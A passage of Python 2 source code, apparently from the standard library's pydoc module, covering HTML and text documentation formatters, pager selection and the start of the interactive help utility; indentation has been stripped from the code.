ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if callable(value) or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda (name, kind, cls, value): visiblename(name),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
if classes:
classlist = map(lambda (key, value): value, classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if callable(value) or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda (name, kind, cls, value): visiblename(name),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
filter(lambda t: not t[0].startswith('_'), attrs)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more %s' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' ' + filename)
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(__builtin__, path):
return getattr(__builtin__, path)
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
pager(title % desc + '\n\n' + text.document(object, name))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('ref/assert', ''),
'break': ('ref/break', 'while for'),
'class': ('ref/class', 'CLASSES SPECIALMETHODS'),
'continue': ('ref/continue', 'while for'),
'def': ('ref/function', ''),
'del': ('ref/del', 'BASICMETHODS'),
'elif': 'if',
'else': ('ref/if', 'while for'),
'except': 'try',
'exec': ('ref/exec', ''),
'finally': 'try',
'for': ('ref/for', 'break continue while'),
'from': 'import',
'global': ('ref/global', 'NAMESPACES'),
'if': ('ref/if', 'TRUTHVALUE'),
'import': ('ref/import', 'MODULES'),
'in': ('ref/comparisons', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('ref/lambdas', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('ref/pass', ''),
'print': ('ref/print', ''),
'raise': ('ref/raise', 'EXCEPTIONS'),
'return': ('ref/return', 'FUNCTIONS'),
'try': ('ref/try', 'EXCEPTIONS'),
'while': ('ref/while', 'break continue if TRUTHVALUE'),
'with': ('ref/with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('ref/yield', ''),
}
topics = {
'TYPES': ('ref/types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('ref/strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING TYPES'),
'STRINGMETHODS': ('lib/string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('lib/typesseq-strings', 'OPERATORS'),
'UNICODE': ('ref/strings', 'encodings unicode SEQUENCES STRINGMETHODS FORMATTING TYPES'),
'NUMBERS': ('ref/numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('ref/integers', 'int range'),
'FLOAT': ('ref/floating', 'float math'),
'COMPLEX': ('ref/imaginary', 'complex cmath'),
'SEQUENCES': ('lib/typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('lib/typesfunctions', 'def TYPES'),
'METHODS': ('lib/typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('lib/bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('lib/bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('lib/bltin-null-object', ''),
'ELLIPSIS': ('lib/bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('lib/bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('lib/specialattrs', ''),
'CLASSES': ('ref/types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('lib/typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('ref/summary', 'lambda or and not in is BOOLEAN COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('ref/objects', 'TYPES'),
'SPECIALMETHODS': ('ref/specialnames', 'BASICMETHODS ATTRIBUTEMETHODS CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('ref/customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('ref/attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('ref/callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('ref/sequence-types', 'SEQUENCES SEQUENCEMETHODS2 SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('ref/sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 SPECIALMETHODS'),
'MAPPINGMETHODS': ('ref/sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('ref/numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT SPECIALMETHODS'),
'EXECUTION': ('ref/execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('ref/naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('ref/dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('ref/exceptions', 'try except finally raise'),
'COERCIONS': ('ref/coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('ref/conversions', 'COERCIONS'),
'IDENTIFIERS': ('ref/identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('ref/id-classes', ''),
'PRIVATENAMES': ('ref/atom-identifiers', ''),
'LITERALS': ('ref/atom-literals', 'STRINGS BACKQUOTES NUMBERS TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('ref/exprlists', 'TUPLES LITERALS'),
'LISTS': ('lib/typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('ref/lists', 'LISTS LITERALS'),
'DICTIONARIES': ('lib/typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('ref/dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('ref/string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('ref/attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('ref/subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('ref/slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('ref/calls', 'EXPRESSIONS'),
'POWER': ('ref/power', 'EXPRESSIONS'),
'UNARY': ('ref/unary', 'EXPRESSIONS'),
'BINARY': ('ref/binary', 'EXPRESSIONS'),
'SHIFTING': ('ref/shifting', 'EXPRESSIONS'),
'BITWISE': ('ref/bitwise', 'EXPRESSIONS'),
'COMPARISON': ('ref/comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('ref/Booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('ref/assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('ref/augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('ref/compound', 'for while break continue'),
'TRUTHVALUE': ('lib/truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('lib/module-pdb', 'pdb'),
'CONTEXTMANAGERS': ('ref/context-managers', 'with'),
}
def __init__(self, input, output):
self.input = input
self.output = output
self.docdir = None
execdir = os.path.dirname(sys.executable)
homedir = os.environ.get('PYTHONHOME')
for dir in [os.environ.get('PYTHONDOCS'),
homedir and os.path.join(homedir, 'doc'),
os.path.join(execdir, 'doc'),
'/usr/doc/python-docs-' + split(sys.version)[0],
'/usr/doc/python-' + split(sys.version)[0],
'/usr/doc/python-docs-' + sys.version[:3],
'/usr/doc/python-' + sys.version[:3],
os.path.join(sys.prefix, 'Resources/English.lproj/Documentation')]:
if dir and os.path.isdir(os.path.join(dir, 'lib')):
self.docdir = dir
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
def __call__(self, request=None):
if request is not None:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://www.python.org/doc/tut/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic):
if not self.docdir:
self.output.write('''
Sorry, topic and keyword documentation is not available because the Python
HTML documentation files could not be found. If you have installed them,
please set the environment variable PYTHONDOCS to indicate their location.
On the Microsoft Windows operating system, the files can be built by
running "hh -decompile . PythonNN.chm" in the C:\PythonNN\Doc> directory.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target)
filename, xrefs = target
filename = self.docdir + '/' + filename + '.html'
try:
file = open(filename)
except:
self.output.write('could not read docs from %s\n' % filename)
return
divpat = re.compile('<div[^>]*navigat.*?</div.*?>', re.I | re.S)
addrpat = re.compile('<address.*?>.*?</address.*?>', re.I | re.S)
document = re.sub(addrpat, '', re.sub(divpat, '', file.read()))
file.close()
import htmllib, formatter, StringIO
buffer = StringIO.StringIO()
parser = htmllib.HTMLParser(
formatter.AbstractFormatter(formatter.DumbWriter(buffer)))
parser.start_table = parser.do_p
parser.end_table = lambda parser=parser: parser.do_p({})
parser.start_tr = parser.do_br
